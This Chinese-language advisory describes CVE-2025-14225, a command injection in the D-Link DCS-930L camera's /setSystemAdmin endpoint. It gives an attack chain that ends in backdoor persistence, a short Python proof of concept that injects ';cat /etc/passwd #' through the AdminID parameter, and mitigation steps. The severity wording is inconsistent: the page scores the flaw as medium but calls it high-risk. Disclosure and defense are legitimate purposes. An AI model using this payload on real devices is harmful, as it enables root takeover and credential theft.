D-Link DCS-930L 1.15.04 alphapd组件setSystemAdmin命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-14225

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DCS-930L 1.15.04

漏洞概述

CVE-2025-14225是D-Link DCS-930L网络摄像头固件1.15.04版本中的一个高危命令注入漏洞。该漏洞存在于alphapd组件的/setSystemAdmin接口中，攻击者可以通过操纵AdminID参数实现远程命令执行。D-Link DCS-930L是一款广泛应用于家庭和小型企业的网络摄像头设备，其web管理界面存在此安全缺陷。攻击者无需高级权限即可利用此漏洞，仅需低权限认证即可发送恶意构造的请求。由于该产品已被官方停止支持，用户无法获得官方安全更新，设备将持续面临被入侵的风险。漏洞已于2025年12月8日公开披露，相关信息已在多个漏洞数据库中收录，公众可获取详细技术信息，这大大增加了被恶意利用的可能性。

技术细节

该漏洞位于D-Link DCS-930L摄像头的alphapd Web服务组件中，具体受影响的功能端点为/setSystemAdmin。在处理AdminID参数时，系统未对用户输入进行充分的命令隔离和过滤，导致攻击者可以通过在参数值中注入操作系统命令分隔符（如分号、管道符等）来执行任意系统命令。alphapd是嵌入式设备上运行的轻量级Web服务器，负责处理HTTP请求并调用底层系统功能。由于该设备运行的是嵌入式Linux系统，注入的命令将以root权限执行，攻击者可完全控制设备。漏洞利用方式为：攻击者构造包含恶意命令的HTTP请求，将AdminID参数设置为类似';cat /etc/passwd #'的值，即可读取系统敏感文件或执行其他未授权操作。由于设备固件更新已停止，用户需采取其他防护措施。

攻击链分析

STEP 1

信息收集

攻击者识别目标D-Link DCS-930L设备，确认其IP地址和运行固件版本为1.15.04

STEP 2

认证绕过或低权限访问

攻击者使用设备默认凭证或通过其他方式获取低权限访问权限

STEP 3

构造恶意请求

攻击者构造包含命令注入payload的HTTP POST请求，目标端点为/setSystemAdmin，AdminID参数中注入系统命令

STEP 4

命令执行

服务器端alphapd组件解析请求时，未过滤AdminID参数中的命令分隔符，导致注入命令在嵌入式Linux系统上以root权限执行

STEP 5

持久化控制

攻击者可写入后门、修改启动脚本或安装恶意软件，实现长期控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14225 PoC - D-Link DCS-930L Command Injection
# Target: D-Link DCS-930L Firmware 1.15.04
# Component: alphapd /setSystemAdmin
# Attack Vector: AdminID parameter

target_ip = "192.168.1.100"
target_url = f"http://{target_ip}/setSystemAdmin"

# Payload to read /etc/passwd file via command injection
payload = {
    "AdminID": ";cat /etc/passwd #",
    "AdminPasswd": "admin"
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

影响范围

D-Link DCS-930L 1.15.04

防御指南

临时缓解措施

由于D-Link DCS-930L已停止支持，无法获得官方安全补丁。建议采取以下临时措施：1) 将设备从公网隔离，仅允许通过VPN或受控网络访问；2) 更改设备默认管理凭证为强密码；3) 使用网络ACL限制管理接口的访问IP范围；4) 监控设备日志关注异常登录和请求；5) 评估设备替换方案，迁移至仍在维护的安全产品。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14225
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14225
3 Details https://www.cvedetails.com/cve/CVE-2025-14225/
4 VulDB https://vuldb.com/cve/CVE-2025-14225
5 Link https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-1/D-Link%20Vulnerability.md
6 Link https://vuldb.com/?ctiid.334667
7 Link https://vuldb.com/?id.334667
8 Link https://vuldb.com/?submit.701774
9 Link https://www.dlink.com/